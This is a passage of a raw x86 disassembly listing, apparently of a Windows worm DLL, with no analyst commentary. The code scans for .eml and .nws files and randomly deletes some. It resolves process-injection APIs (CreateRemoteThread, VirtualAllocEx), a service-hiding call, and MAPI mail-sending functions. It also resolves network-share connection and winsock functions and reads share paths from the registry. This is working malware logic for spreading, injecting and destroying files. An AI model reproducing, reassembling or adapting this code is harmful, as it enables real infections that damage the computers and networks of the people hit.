sub_3617455C+C6j ... 3617469D lea eax, [ebp+var_14C] 361746A3 push ebx 361746A4 mov ebx, ds:FindNextFileA 361746AA push eax 361746AB push [ebp+var_8] 361746AE 361746AE loc_361746AE: ; CODE XREF: sub_3617455C+217j 361746AE call ebx ; FindNextFileA 361746B0 test eax, eax 361746B2 jz loc_36174778 361746B8 lea eax, [ebp+var_120] 361746BE push eax 361746BF call esi ; _strlwr 361746C1 lea eax, [ebp+var_120] 361746C7 push edi 361746C8 push eax 361746C9 call _strcmp 361746CE add esp, 0Ch 361746D1 test eax, eax 361746D3 jz loc_36174769 361746D9 lea eax, [ebp+var_120] 361746DF push offset a__ ; ".." 361746E4 push eax 361746E5 call _strcmp 361746EA pop ecx 361746EB test eax, eax 361746ED pop ecx 361746EE jz short loc_36174769 361746F0 lea eax, [ebp+var_120] 361746F6 push eax 361746F7 call _strlen 361746FC cmp eax, 4 361746FF pop ecx 36174700 jbe short loc_36174769 36174702 test [ebp+var_14C], 10h 36174709 jnz short loc_36174769 3617470B lea eax, [ebp+var_120] 36174711 push offset dot_eml ; ".eml" 36174716 push eax 36174717 call _strlen 3617471C pop ecx 3617471D lea eax, [ebp+eax+var_124] 36174724 push eax 36174725 call _strcmp 3617472A pop ecx 3617472B test eax, eax 3617472D pop ecx 3617472E jz short loc_36174755 36174730 lea eax, [ebp+var_120] 36174736 push offset dot_nws ; ".nws" 3617473B push eax 3617473C call _strlen 36174741 pop ecx 36174742 lea eax, [ebp+eax+var_124] 36174749 push eax 3617474A call _strcmp 3617474F pop ecx 36174750 test eax, eax 36174752 pop ecx 36174753 jnz short loc_36174769 36174755 36174755 loc_36174755: ; CODE XREF: sub_3617455C+1D2j 36174755 lea eax, [ebp+var_120] 3617475B push eax 3617475C push [ebp+arg_0] 3617475F call sub_361747A9 36174764 pop ecx 36174765 mov [ebp+var_4], eax 36174768 pop ecx 36174769 36174769 loc_36174769: ; CODE XREF: sub_3617455C+177j 36174769 ; sub_3617455C+192j ... 36174769 lea eax, [ebp+var_14C] 3617476F push eax 36174770 push [ebp+var_8] 36174773 jmp loc_361746AE 36174778 ; ─────────────────────────────────────────────────────────────────────────── 36174778 36174778 loc_36174778: ; CODE XREF: sub_3617455C+156j 36174778 push [ebp+var_8] 3617477B call ds:FindClose 36174781 push [ebp+var_C] 36174784 push 0 36174786 push dword_3617ACB4 3617478C call dword_3617AC70 36174792 cmp [ebp+var_4], 0 36174796 pop ebx 36174797 jz short loc_361747A2 36174799 push [ebp+arg_0] 3617479C call sub_36174374 361747A1 pop ecx 361747A2 361747A2 loc_361747A2: ; CODE XREF: sub_3617455C+80j 361747A2 ; sub_3617455C+23Bj 361747A2 push 1 361747A4 pop eax 361747A5 361747A5 loc_361747A5: ; CODE XREF: sub_3617455C+2Aj 361747A5 pop edi 361747A6 pop esi 361747A7 leave 361747A8 retn 361747A8 sub_3617455C endp 361747A8 361747A9 361747A9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361747A9 361747A9 361747A9 sub_361747A9 proc near ; CODE XREF: sub_3617455C+137p 361747A9 ; sub_3617455C+203p 361747A9 push ebx 361747AA push ebp 361747AB push esi 361747AC push edi 361747AD mov edi, 400h 361747B2 push edi 361747B3 push 8 361747B5 push dword_3617ACB4 361747BB call dword_3617AC74 361747C1 mov esi, eax 361747C3 xor ebx, ebx 361747C5 cmp esi, ebx 361747C7 jz loc_361748BB 361747CD push edi 361747CE push dword ptr [esp+18h] 361747D2 push esi 361747D3 call ds:strncpy 361747D9 push esi 361747DA call sub_3617186E 361747DF push esi 361747E0 call _strlen 361747E5 sub edi, eax 361747E7 push edi 361747E8 mov edi, ds:strncat 361747EE push offset asc_36179474 ; "\\" 361747F3 push esi 361747F4 call edi ; strncat 361747F6 push esi 361747F7 call _strlen 361747FC mov ecx, 3FFh 36174801 sub ecx, eax 36174803 push ecx 36174804 push dword ptr [esp+40h] 36174808 push esi 36174809 call edi ; strncat 3617480B add esp, 30h 3617480E call ds:rand 36174814 imul eax, 64h 36174817 cdq 36174818 mov ecx, 7FFFh 3617481D idiv ecx 3617481F inc eax 36174820 cmp eax, 5Fh 36174823 jle short loc_3617483A 36174825 push 80h 3617482A push esi 3617482B call ds:SetFileAttributesA 36174831 push esi 36174832 call ds:DeleteFileA 36174838 jmp short loc_3617485B 3617483A ; ─────────────────────────────────────────────────────────────────────────── 3617483A 3617483A loc_3617483A: ; CODE XREF: sub_361747A9+7Aj 3617483A push ebx 3617483B push ebx 3617483C push 3 3617483E push ebx 3617483F mov ebx, ds:CreateFileA 36174845 mov ebp, 80000000h 3617484A push 7 3617484C push ebp 3617484D push offset byte_3617C8B8 36174852 call ebx ; CreateFileA 36174854 mov edi, eax 36174856 cmp edi, 0FFFFFFFFh 36174859 jnz short loc_36174862 3617485B 3617485B loc_3617485B: ; CODE XREF: sub_361747A9+8Fj 3617485B ; sub_361747A9+D2j ... 3617485B xor edi, edi 3617485D jmp loc_361748E3 36174862 ; ─────────────────────────────────────────────────────────────────────────── 36174862 36174862 loc_36174862: ; CODE XREF: sub_361747A9+B0j 36174862 push 0 36174864 push edi 36174865 call ds:GetFileSize 3617486B cmp eax, 0FFFFFFFFh 3617486E mov [esp+14h], eax 36174872 push edi 36174873 jnz short loc_3617487D 36174875 call ds:CloseHandle 3617487B jmp short loc_3617485B 3617487D ; ─────────────────────────────────────────────────────────────────────────── 3617487D 3617487D loc_3617487D: ; CODE XREF: sub_361747A9+CAj 3617487D mov edi, ds:CloseHandle 36174883 call edi ; CloseHandle 36174885 xor eax, eax 36174887 push eax 36174888 push eax 36174889 push 3 3617488B push eax 3617488C push 7 3617488E push ebp 3617488F push esi 36174890 call ebx ; CreateFileA 36174892 mov ebx, eax 36174894 cmp ebx, 0FFFFFFFFh 36174897 jz short loc_3617485B 36174899 push 0 3617489B push ebx 3617489C call ds:GetFileSize 361748A2 mov ebp, eax 361748A4 cmp ebp, 0FFFFFFFFh 361748A7 jnz short loc_361748BF 361748A9 push esi 361748AA push 0 361748AC push dword_3617ACB4 361748B2 call dword_3617AC70 361748B8 push ebx 361748B9 call edi ; CloseHandle 361748BB 361748BB loc_361748BB: ; CODE XREF: sub_361747A9+1Ej 361748BB xor eax, eax 361748BD jmp short loc_361748F4 361748BF ; ─────────────────────────────────────────────────────────────────────────── 361748BF 361748BF loc_361748BF: ; CODE XREF: sub_361747A9+FEj 361748BF push ebx 361748C0 call edi ; CloseHandle 361748C2 mov eax, [esp+14h] 361748C6 add eax, 1Eh 361748C9 cmp eax, ebp 361748CB jnb short loc_3617485B 361748CD push 80h 361748D2 push esi 361748D3 call ds:SetFileAttributesA 361748D9 push esi 361748DA call ds:DeleteFileA 361748E0 push 1 361748E2 pop edi 361748E3 361748E3 loc_361748E3: ; CODE XREF: sub_361747A9+B4j 361748E3 push esi 361748E4 push 0 361748E6 push dword_3617ACB4 361748EC call dword_3617AC70 361748F2 mov eax, edi 361748F4 361748F4 loc_361748F4: ; CODE XREF: sub_361747A9+114j 361748F4 pop edi 361748F5 pop esi 361748F6 pop ebp 361748F7 pop ebx 361748F8 retn 361748F8 sub_361747A9 endp ; sp = -18h 361748F8 361748F9 361748F9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361748F9 361748F9 ; Attributes: bp-based frame 361748F9 361748F9 sub_361748F9 proc near ; CODE XREF: _DllMain@12+BAp 361748F9 361748F9 var_400 = byte ptr -400h 361748F9 361748F9 push ebp 361748FA mov ebp, esp 361748FC sub esp, 400h 36174902 push esi 36174903 mov esi, dword_3617ACB4 36174909 push edi 3617490A push 2820h 3617490F push 0 36174911 push offset dword_3617AC98 36174916 call _memset 3617491B add esp, 0Ch 3617491E mov dword_3617ACB4, esi 36174924 push 0 36174926 call ds:GetModuleHandleA 3617492C mov dword_3617ACAC, eax 36174931 call sub_36174A06 36174936 mov esi, 400h 3617493B mov edi, offset byte_3617B0B8 36174940 push esi 36174941 push edi 36174942 call ds:GetWindowsDirectoryA 36174948 push edi 36174949 call sub_3617186E 3617494E pop ecx 3617494F mov edi, offset byte_3617ACB8 36174954 push esi 36174955 push edi 36174956 call ds:GetSystemDirectoryA 3617495C push edi 3617495D call sub_3617186E 36174962 pop ecx 36174963 mov edi, offset byte_3617B4B8 36174968 push edi 36174969 push esi 3617496A call ds:GetTempPathA 36174970 push edi 36174971 call sub_3617186E 36174976 pop ecx 36174977 call ds:GetCommandLineA 3617497D push eax 3617497E push offset byte_3617CCB8 36174983 call _strcpy 36174988 pop ecx 36174989 mov edi, offset byte_3617D0B8 3617498E pop ecx 3617498F push edi 36174990 push esi 36174991 call ds:GetCurrentDirectoryA 36174997 push edi 36174998 call sub_3617186E 3617499D pop ecx 3617499E lea eax, [ebp+var_400] 361749A4 push esi 361749A5 push eax 361749A6 push 0 361749A8 call ds:GetModuleFileNameA 361749AE lea eax, [ebp+var_400] 361749B4 push eax 361749B5 push offset byte_3617C0B8 361749BA call _strcpy 361749BF lea eax, [ebp+var_400] 361749C5 push 5Ch 361749C7 push eax 361749C8 call ds:strrchr 361749CE mov esi, eax 361749D0 inc esi 361749D1 push esi 361749D2 push offset byte_3617B8B8 361749D7 call _strcpy 361749DC and byte ptr [esi], 0 361749DF lea eax, [ebp+var_400] 361749E5 mov esi, offset byte_3617BCB8 361749EA push eax 361749EB push esi 361749EC call _strcpy 361749F1 push esi 361749F2 call sub_3617186E 361749F7 add esp, 24h 361749FA call K32_imports 361749FF push 1 36174A01 pop eax 36174A02 pop edi 36174A03 pop esi 36174A04 leave 36174A05 retn 36174A05 sub_361748F9 endp 36174A05 36174A06 36174A06 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174A06 36174A06 ; Attributes: bp-based frame 36174A06 36174A06 sub_36174A06 proc near ; CODE XREF: sub_361748F9+38p 36174A06 ; sub_36176511+22p 36174A06 36174A06 var_94 = dword ptr -94h 36174A06 var_84 = dword ptr -84h 36174A06 36174A06 push ebp 36174A07 mov ebp, esp 36174A09 sub esp, 94h 36174A0F lea eax, [ebp+var_94] 36174A15 mov [ebp+var_94], 94h 36174A1F push eax 36174A20 call ds:GetVersionExA ; Get extended information about the 36174A20 ; version of the operating system 36174A26 xor eax, eax 36174A28 cmp [ebp+var_84], 2 36174A2F setz al 36174A32 mov dword_3617ACB0, eax 36174A37 leave 36174A38 retn 36174A38 sub_36174A06 endp 36174A38 36174A39 36174A39 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174A39 36174A39 36174A39 K32_imports proc near ; CODE XREF: sub_36171F05+Ap 36174A39 ; sub_361748F9+101p 36174A39 push esi 36174A3A push edi 36174A3B mov edi, ds:LoadLibraryA 36174A41 push offset KERNEL32_DLL ; "KERNEL32.DLL" 36174A46 call edi ; LoadLibraryA 36174A48 test eax, eax 36174A4A mov dword_3617AC98, eax 36174A4F jz loc_36174B37 36174A55 mov esi, ds:GetProcAddress 36174A5B push offset aHeapcreate ; "HeapCreate" 36174A60 push eax 36174A61 call esi ; GetProcAddress 36174A63 push offset aHeapdestroy ; "HeapDestroy" 36174A68 mov dword_3617AC7C, eax 36174A6D push dword_3617AC98 36174A73 call esi ; GetProcAddress 36174A75 push offset aHeapalloc ; "HeapAlloc" 36174A7A mov dword_3617AC78, eax 36174A7F push dword_3617AC98 36174A85 call esi ; GetProcAddress 36174A87 push offset aHeapfree ; "HeapFree" 36174A8C mov dword_3617AC74, eax 36174A91 push dword_3617AC98 36174A97 call esi ; GetProcAddress 36174A99 push offset aHeapcompact ; "HeapCompact" 36174A9E mov dword_3617AC70, eax 36174AA3 push dword_3617AC98 36174AA9 call esi ; GetProcAddress 36174AAB cmp dword_3617ACB0, 0 36174AB2 mov dword_3617AC6C, eax 36174AB7 jz short loc_36174B15 36174AB9 push offset aCreateremoteth ; "CreateRemoteThread" 36174ABE push dword_3617AC98 36174AC4 call esi ; GetProcAddress 36174AC6 push offset aVirtualprotect ; "VirtualProtectEx" 36174ACB mov dword_3617D5E0, eax 36174AD0 push dword_3617AC98 36174AD6 call esi ; GetProcAddress 36174AD8 push offset aVirtualallocex ; "VirtualAllocEx" 36174ADD mov dword_3617D5D0, eax 36174AE2 push dword_3617AC98 36174AE8 call esi ; GetProcAddress 36174AEA push offset aVirtualqueryex ; "VirtualQueryEx" 36174AEF mov dword_3617D5DC, eax 36174AF4 push dword_3617AC98 36174AFA call esi ; GetProcAddress 36174AFC push offset aVirtualfreeex ; "VirtualFreeEx" 36174B01 mov dword_3617D5D4, eax 36174B06 push dword_3617AC98 36174B0C call esi ; GetProcAddress 36174B0E mov dword_3617D5D8, eax 36174B13 jmp short loc_36174B27 36174B15 ; ─────────────────────────────────────────────────────────────────────────── 36174B15 36174B15 loc_36174B15: ; CODE XREF: K32_imports+7Ej 36174B15 push offset aRegisterservic ; "RegisterServiceProcess" 36174B1A push dword_3617AC98 36174B20 call esi ; GetProcAddress 36174B22 mov dword_3617D5CC, eax 36174B27 36174B27 loc_36174B27: ; CODE XREF: K32_imports+DAj 36174B27 push offset SHELL32DLL ; "SHELL32.DLL" 36174B2C call edi ; LoadLibraryA 36174B2E test eax, eax 36174B30 mov dword_3617AC9C, eax 36174B35 jnz short loc_36174B3E 36174B37 36174B37 loc_36174B37: ; CODE XREF: K32_imports+16j 36174B37 xor eax, eax 36174B39 jmp loc_36174DC5 36174B3E ; ─────────────────────────────────────────────────────────────────────────── 36174B3E 36174B3E loc_36174B3E: ; CODE XREF: K32_imports+FCj 36174B3E push offset aShellexecutea ; "ShellExecuteA" 36174B43 push eax 36174B44 call esi ; GetProcAddress 36174B46 push offset MPRDLL ; "MPR.DLL" 36174B4B mov dword_3617AC94, eax 36174B50 call edi ; LoadLibraryA 36174B52 test eax, eax 36174B54 mov dword_3617ACA0, eax 36174B59 jz short MAPI_calls 36174B5B push offset aWnetcloseenum ; "WNetCloseEnum" 36174B60 push eax 36174B61 call esi ; GetProcAddress 36174B63 push offset aWnetenumresour ; "WNetEnumResourceA" 36174B68 mov dword_3617AC90, eax 36174B6D push dword_3617ACA0 36174B73 call esi ; GetProcAddress 36174B75 push offset aWnetopenenuma ; "WNetOpenEnumA" 36174B7A mov dword_3617AC8C, eax 36174B7F push dword_3617ACA0 36174B85 call esi ; GetProcAddress 36174B87 push offset aWnetcancelconn ; "WNetCancelConnection2A" 36174B8C mov dword_3617AC88, eax 36174B91 push dword_3617ACA0 36174B97 call esi ; GetProcAddress 36174B99 push offset aWnetaddconnect ; "WNetAddConnection2A" 36174B9E mov dword_3617AC84, eax 36174BA3 push dword_3617ACA0 36174BA9 call esi ; GetProcAddress 36174BAB mov dword_3617AC80, eax 36174BB0 36174BB0 MAPI_calls: ; CODE XREF: K32_imports+120j 36174BB0 push offset MAPI32DLL ; "MAPI32.DLL" 36174BB5 call edi ; LoadLibraryA 36174BB7 test eax, eax 36174BB9 mov dword_3617ACA4, eax 36174BBE jz short winsock_calls 36174BC0 push offset aMapilogon ; "MAPILogon" 36174BC5 push eax 36174BC6 call esi ; GetProcAddress 36174BC8 push offset aMapiresolvenam ; "MAPIResolveName" 36174BCD mov dword_3617D6FC, eax 36174BD2 push dword_3617ACA4 36174BD8 call esi ; GetProcAddress 36174BDA push offset aMapifindnext ; "MAPIFindNext" 36174BDF mov dword_3617D6F8, eax 36174BE4 push dword_3617ACA4 36174BEA call esi ; GetProcAddress 36174BEC push offset aMapireadmail ; "MAPIReadMail" 36174BF1 mov dword_3617D6F4, eax 36174BF6 push dword_3617ACA4 36174BFC call esi ; GetProcAddress 36174BFE push offset aMapifreebuffer ; "MAPIFreeBuffer" 36174C03 mov dword_3617D6F0, eax 36174C08 push dword_3617ACA4 36174C0E call esi ; GetProcAddress 36174C10 push offset aMapisendmail ; "MAPISendMail" 36174C15 mov dword_3617D6EC, eax 36174C1A push dword_3617ACA4 36174C20 call esi ; GetProcAddress 36174C22 push offset aMapilogoff ; "MAPILogoff" 36174C27 mov dword_3617D6E8, eax 36174C2C push dword_3617ACA4 36174C32 call esi ; GetProcAddress 36174C34 mov dword_3617D6E4, eax 36174C39 36174C39 winsock_calls: ; CODE XREF: K32_imports+185j 36174C39 push offset WS2_32_DLL ; "ws2_32.dll" 36174C3E call edi ; LoadLibraryA 36174C40 test eax, eax 36174C42 mov dword_3617ACA8, eax 36174C47 jz loc_36174DC2 36174C4D push offset aWsastartup ; "WSAStartup" 36174C52 push eax 36174C53 call esi ; GetProcAddress 36174C55 push offset aWsacleanup ; "WSACleanup" 36174C5A mov dword_3617AC68, eax 36174C5F push dword_3617ACA8 36174C65 call esi ; GetProcAddress 36174C67 push offset a__wsafdisset ; "__WSAFDIsSet" 36174C6C mov dword_3617AC64, eax 36174C71 push dword_3617ACA8 36174C77 call esi ; GetProcAddress 36174C79 push offset socket ; "socket" 36174C7E mov dword_3617AC60, eax 36174C83 push dword_3617ACA8 36174C89 call esi ; GetProcAddress 36174C8B push offset connect ; "connect" 36174C90 mov dword_3617AC5C, eax 36174C95 push dword_3617ACA8 36174C9B call esi ; GetProcAddress 36174C9D push offset bind ; "bind" 36174CA2 mov dword_3617AC58, eax 36174CA7 push dword_3617ACA8 36174CAD call esi ; GetProcAddress 36174CAF push offset recv ; "recv" 36174CB4 mov dword_3617AC54, eax 36174CB9 push dword_3617ACA8 36174CBF call esi ; GetProcAddress 36174CC1 push offset recvfrom ; "recvfrom" 36174CC6 mov dword_3617AC50, eax 36174CCB push dword_3617ACA8 36174CD1 call esi ; GetProcAddress 36174CD3 push offset send ; "send" 36174CD8 mov dword_3617AC4C, eax 36174CDD push dword_3617ACA8 36174CE3 call esi ; GetProcAddress 36174CE5 push offset sendto ; "sendto" 36174CEA mov dword_3617AC48, eax 36174CEF push dword_3617ACA8 36174CF5 call esi ; GetProcAddress 36174CF7 push offset select ; "select" 36174CFC mov dword_3617AC44, eax 36174D01 push dword_3617ACA8 36174D07 call esi ; GetProcAddress 36174D09 push offset aClosesocket ; "closesocket" 36174D0E mov dword_3617AC40, eax 36174D13 push dword_3617ACA8 36174D19 call esi ; GetProcAddress 36174D1B push offset aHtons ; "htons" 36174D20 mov dword_3617AC3C, eax 36174D25 push dword_3617ACA8 36174D2B call esi ; GetProcAddress 36174D2D push offset aNtohs ; "ntohs" 36174D32 mov dword_3617AC38, eax 36174D37 push dword_3617ACA8 36174D3D call esi ; GetProcAddress 36174D3F push offset aHtonl ; "htonl" 36174D44 mov dword_3617AC34, eax 36174D49 push dword_3617ACA8 36174D4F call esi ; GetProcAddress 36174D51 push offset aNtohl ; "ntohl" 36174D56 mov dword_3617AC2C, eax 36174D5B push dword_3617ACA8 36174D61 call esi ; GetProcAddress 36174D63 push offset aInet_addr ; "inet_addr" 36174D68 mov dword_3617AC30, eax 36174D6D push dword_3617ACA8 36174D73 call esi ; GetProcAddress 36174D75 push offset aInet_ntoa ; "inet_ntoa" 36174D7A mov dword_3617AC28, eax 36174D7F push dword_3617ACA8 36174D85 call esi ; GetProcAddress 36174D87 push offset aGethostname ; "gethostname" 36174D8C mov dword_3617AC24, eax 36174D91 push dword_3617ACA8 36174D97 call esi ; GetProcAddress 36174D99 push offset aGethostbyname ; "gethostbyname" 36174D9E mov dword_3617AC1C, eax 36174DA3 push dword_3617ACA8 36174DA9 call esi ; GetProcAddress 36174DAB mov dword_3617AC20, eax 36174DB0 push offset aIoctlsocket ; "ioctlsocket" 36174DB5 push dword_3617ACA8 36174DBB call esi ; GetProcAddress 36174DBD mov dword_3617AC18, eax 36174DC2 36174DC2 loc_36174DC2: ; CODE XREF: K32_imports+20Ej 36174DC2 push 1 36174DC4 pop eax 36174DC5 36174DC5 loc_36174DC5: ; CODE XREF: K32_imports+100j 36174DC5 pop edi 36174DC6 pop esi 36174DC7 retn 36174DC7 K32_imports endp 36174DC7 36174DC8 36174DC8 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174DC8 36174DC8 36174DC8 sub_36174DC8 proc near ; CODE XREF: _DllMain@12+EDp 36174DC8 ; _DllMain@12+165p ... 36174DC8 mov eax, dword_3617AC98 36174DCD push esi 36174DCE mov esi, ds:FreeLibrary 36174DD4 test eax, eax 36174DD6 jz short loc_36174DDB 36174DD8 push eax 36174DD9 call esi ; FreeLibrary 36174DDB 36174DDB loc_36174DDB: ; CODE XREF: sub_36174DC8+Ej 36174DDB mov eax, dword_3617AC9C 36174DE0 test eax, eax 36174DE2 jz short loc_36174DE7 36174DE4 push eax 36174DE5 call esi ; FreeLibrary 36174DE7 36174DE7 loc_36174DE7: ; CODE XREF: sub_36174DC8+1Aj 36174DE7 mov eax, dword_3617ACA0 36174DEC test eax, eax 36174DEE jz short loc_36174DF3 36174DF0 push eax 36174DF1 call esi ; FreeLibrary 36174DF3 36174DF3 loc_36174DF3: ; CODE XREF: sub_36174DC8+26j 36174DF3 mov eax, dword_3617ACA4 36174DF8 test eax, eax 36174DFA jz short loc_36174DFF 36174DFC push eax 36174DFD call esi ; FreeLibrary 36174DFF 36174DFF loc_36174DFF: ; CODE XREF: sub_36174DC8+32j 36174DFF mov eax, dword_3617ACA8 36174E04 test eax, eax 36174E06 jz short loc_36174E0B 36174E08 push eax 36174E09 call esi ; FreeLibrary 36174E0B 36174E0B loc_36174E0B: ; CODE XREF: sub_36174DC8+3Ej 36174E0B push 1 36174E0D pop eax 36174E0E pop esi 36174E0F retn 36174E0F sub_36174DC8 endp 36174E0F 36174E10 36174E10 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174E10 36174E10 ; Attributes: bp-based frame 36174E10 36174E10 sub_36174E10 proc near ; CODE XREF: sub_36171F05+EEp 36174E10 36174E10 var_614 = byte ptr -614h 36174E10 var_214 = byte ptr -214h 36174E10 var_114 = byte ptr -114h 36174E10 var_14 = dword ptr -14h 36174E10 var_10 = dword ptr -10h 36174E10 var_C = dword ptr -0Ch 36174E10 var_8 = dword ptr -8 36174E10 var_4 = dword ptr -4 36174E10 36174E10 push ebp 36174E11 mov ebp, esp 36174E13 sub esp, 614h 36174E19 push ebx 36174E1A mov ebx, ds:RegOpenKeyExA 36174E20 lea eax, [ebp+var_C] 36174E23 push esi 36174E24 push eax 36174E25 xor esi, esi 36174E27 push 0F003Fh 36174E2C push esi 36174E2D push offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 36174E32 push 80000002h 36174E37 call ebx ; RegOpenKeyExA 36174E39 test eax, eax 36174E3B jnz loc_36174F1A 36174E41 push edi 36174E42 push esi 36174E43 push esi 36174E44 push esi 36174E45 lea eax, [ebp+var_8] 36174E48 mov edi, ds:RegEnumKeyExA 36174E4E push esi 36174E4F push eax 36174E50 lea eax, [ebp+var_214] 36174E56 mov [ebp+var_8], 0FFh 36174E5D push eax 36174E5E push esi 36174E5F push [ebp+var_C] 36174E62 mov [ebp+var_4], esi 36174E65 36174E65 loc_36174E65: ; CODE XREF: sub_36174E10+FBj 36174E65 call edi ; RegEnumKeyExA 36174E67 test eax, eax 36174E69 jnz loc_36174F10 36174E6F lea eax, [ebp+var_114] 36174E75 push offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 36174E7A push eax 36174E7B call _strcpy 36174E80 lea eax, [ebp+var_214] 36174E86 push eax 36174E87 lea eax, [ebp+var_114] 36174E8D push eax 36174E8E call _strcat 36174E93 add esp, 10h 36174E96 lea eax, [ebp+var_10] 36174E99 push eax 36174E9A push 0F003Fh 36174E9F lea eax, [ebp+var_114] 36174EA5 push esi 36174EA6 push eax 36174EA7 push 80000002h 36174EAC call ebx ; RegOpenKeyExA 36174EAE test eax, eax 36174EB0 jnz short loc_36174EEC 36174EB2 lea eax, [ebp+var_14] 36174EB5 mov [ebp+var_14], 400h 36174EBC push eax 36174EBD lea eax, [ebp+var_614] 36174EC3 push eax 36174EC4 push esi 36174EC5 push [ebp+var_10] 36174EC8 call ds:RegQueryValueA 36174ECE cmp dword_3617ACB0, esi 36174ED4 jz short loc_36174EE3 36174ED6 lea eax, [ebp+var_614] 36174EDC push eax 36174EDD call sub_36173878 36174EE2 pop ecx 36174EE3 36174EE3 loc_36174EE3: ; CODE XREF: sub_36174E10+C4j 36174EE3 push [ebp+var_10] 36174EE6 call ds:RegCloseKey 36174EEC 36174EEC loc_36174EEC: ; CODE XREF: sub_36174E10+A0j 36174EEC inc [ebp+var_4] 36174EEF push esi 36174EF0 push esi 36174EF1 push esi 36174EF2 lea eax, [ebp+var_8] 36174EF5 push esi 36174EF6 push eax 36174EF7 lea eax, [ebp+var_214] 36174EFD push eax 36174EFE mov [ebp+var_8], 0FFh 36174F05 push [ebp+var_4] 36174F08 push [ebp+var_C] 36174F0B jmp loc_36174E65 36174F10 ; ─────────────────────────────────────────────────────────────────────────── 36174F10 36174F10 loc_36174F10: ; CODE XREF: sub_36174E10+59j 36174F10 push [ebp+var_C] 36174F13 call ds:RegCloseKey 36174F19 pop edi 36174F1A 36174F1A loc_36174F1A: ; CODE XREF: sub_36174E10+2Bj 36174F1A pop esi 36174F1B pop ebx 36174F1C leave 36174F1D retn 36174F1D sub_36174E10 endp 36174F1D 36174F1E 36174F1E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174F1E 36174F1E ; Attributes: bp-based frame 36174F1E 36174F1E sub_36174F1E proc near ; CODE XREF: sub_36171F05+103p 36174F1E 36174F1E var_75C = byte ptr -75Ch 36174F1E var_35C = byte ptr -35Ch 36174F1E var_35B = byte ptr -35Bh 36174F1E var_260 = byte ptr -260h 36174F1E var_15C = byte ptr -15Ch 36174F1E var_15B = byte ptr -15Bh 36174F1E var_5C = byte ptr -5Ch 36174F1E var_23 = byte ptr -23h 36174F1E var_20 = dword ptr -20h 36174F1E var_1C = dword ptr -1Ch 36174F1E var_18 = dword ptr -18h 36174F1E var_11 = byte ptr -11h 36174F1E var_10 = dword ptr -10h 36174F1E var_C = dword ptr -0Ch 36174F1E var_8 = dword ptr -8 36174F1E var_4 = dword ptr -4 36174F1E 36174F1E push ebp 36174F1F mov ebp, esp 36174F21 sub esp, 75Ch 36174F27 push ebx 36174F28 push esi 36174F29 xor esi, esi 36174F2B push edi 36174F2C cmp dword_3617ACB0, esi 36174F32 jz loc_36175025 36174F38 lea eax, [ebp+var_10] 36174F3B mov [ebp+var_C], 0FFh 36174F42 push eax 36174F43 push 0F003Fh 36174F48 push esi 36174F49 push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\lanma"... 36174F4E push 80000002h 36174F53 mov [ebp+var_4], 1FEh 36174F5A call ds:RegOpenKeyExA 36174F60 test eax, eax 36174F62 jnz loc_36175251 36174F68 lea eax, [ebp+var_4] 36174F6B mov edi, ds:RegEnumValueA 36174F71 push eax 36174F72 lea eax, [ebp+var_35C] 36174F78 push eax 36174F79 push esi 36174F7A lea eax, [ebp+var_C] 36174F7D push esi 36174F7E push eax 36174F7F lea eax, [ebp+var_15C] 36174F85 push eax 36174F86 push esi 36174F87 push [ebp+var_10] 36174F8A mov [ebp+var_8], esi 36174F8D 36174F8D loc_36174F8D: ; CODE XREF: sub_36174F1E+FAj 36174F8D call edi ; RegEnumValueA 36174F8F test eax, eax 36174F91 jnz loc_3617501D 36174F97 cmp [ebp+var_15B], 24h 36174F9E jz short loc_36174FE9 36174FA0 mov eax, [ebp+var_4] 36174FA3 xor ebx, ebx 36174FA5 xor edx, edx 36174FA7 lea ecx, [eax-4] 36174FAA cmp ecx, esi 36174FAC jbe short loc_36174FE9 36174FAE 36174FAE loc_36174FAE: ; CODE XREF: sub_36174F1E+BEj 36174FAE cmp [ebp+edx+var_35C], 50h 36174FB6 lea eax, [ebp+edx+var_35B] 36174FBD jnz short loc_36174FD9 36174FBF cmp byte ptr [eax], 61h 36174FC2 jnz short loc_36174FD9 36174FC4 cmp byte ptr [eax+1], 74h 36174FC8 jnz short loc_36174FD9 36174FCA cmp byte ptr [eax+2], 68h 36174FCE jnz short loc_36174FD9 36174FD0 cmp byte ptr [eax+3], 3Dh 36174FD4 jnz short loc_36174FD9 36174FD6 lea ebx, [eax+4] 36174FD9 36174FD9 loc_36174FD9: ; CODE XREF: sub_36174F1E+9Fj 36174FD9 ; sub_36174F1E+A4j ... 36174FD9 inc edx 36174FDA cmp edx, ecx 36174FDC jb short loc_36174FAE 36174FDE cmp ebx, esi 36174FE0 jz short loc_36174FE9 36174FE2 push ebx 36174FE3 call sub_36173DCF 36174FE8 pop ecx 36174FE9 36174FE9 loc_36174FE9: ; CODE XREF: sub_36174F1E+80j 36174FE9 ; sub_36174F1E+8Ej ... 36174FE9 lea eax, [ebp+var_4] 36174FEC inc [ebp+var_8] 36174FEF push eax 36174FF0 lea eax, [ebp+var_35C] 36174FF6 push eax 36174FF7 push esi 36174FF8 lea eax, [ebp+var_C] 36174FFB push esi 36174FFC push eax 36174FFD lea eax, [ebp+var_15C] 36175003 push eax 36175004 mov [ebp+var_C], 0FFh 3617500B push [ebp+var_8] 3617500E mov [ebp+var_4], 1FEh 36175015 push [ebp+var_10] 36175018 jmp loc_36174F8D 3617501D ; ─────────────────────────────────────────────────────────────────────────── 3617501D 3617501D loc_3617501D: ; CODE XREF: sub_36174F1E+73j 3617501D push [ebp+var_10] 36175020 jmp loc_3617524B 36175025 ; ─────────────────────────────────────────────────────────────────────────── 36175025 36175025 loc_36175025: ; CODE XREF: sub_36174F1E+14j 36175025 lea eax, [ebp+var_20] 36175028 mov [ebp+var_20], esi 3617502B push eax 3617502C lea eax, [ebp+var_1C] 3617502F push eax 36175030 push esi 36175031 push 0F003Fh 36175036 push esi 36175037 push esi 36175038 push esi 36175039 push offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 3617503E push 80000002h 36175043 call ds:RegCreateKeyExA 36175049 test eax, eax 